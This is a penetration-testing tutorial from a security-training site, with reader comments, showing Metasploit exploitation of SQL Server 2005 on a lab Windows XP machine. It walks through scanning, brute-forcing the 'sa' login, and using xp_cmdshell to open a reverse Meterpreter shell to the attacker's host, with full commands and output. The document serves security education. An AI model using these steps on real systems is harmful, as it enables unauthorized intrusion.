Tutorial: Exploiting MS SQL Server with Metasploit – Fast Track

July 20, 2016 | Views: 21473

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

The exploitee’s system comprises: 

  • Windows XP Pro Service Pack 2 (unpatched)
  • Firewall and software updates switched off
  • Microsoft Internet Information Services (IIS) (server) and FTP service enabled
  • SQL Server 2005 Express configured
  • A vulnerable web app up and running

 

Let’s begin: Nmap scan from within Metasploit. The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

 

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course, I know it’s Service Pack 2.

 

MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

And, the scan confirms this.

 

Now, use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

There’s lots of information here. Now, brute force MS SQL with mssql_login:

>msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′

MS SQL password and login successfully guessed.

 

Now, use the mssql_payload, which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)

[….]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

 

So, I’m inside the target machine with the Meterpreter shell.

 

I hope this was helpful to you. Please post your comments and questions below.

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
12 Comments
  1. Thanks. Tried with my kali machine and target machine – SQL Server 2005/Window XP. Works great. Nice way to learn and play with exploitation locally. Appreciate your effort/

  2. You’re so hacker huh? I am so amazed with: [+] 192.168.1.79:1433 – MSSQL – successful login ‘sa’ : ‘password1′” Dude, you rock! You gotta use a metasploit to guess default creds. Well, well… What else? Another Metasploit tutor on sniffing telnet session? Don’t forget to add another copypasta like collegues form India used to.

    • Kid ! , Its a community Forum where we have to start from basics. 🙂 ..

      If you want to do specialisation then pay for it. Quality comes with price Kid !

  3. I think this post is talking about vuln that can upload or execute remote code, right?

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel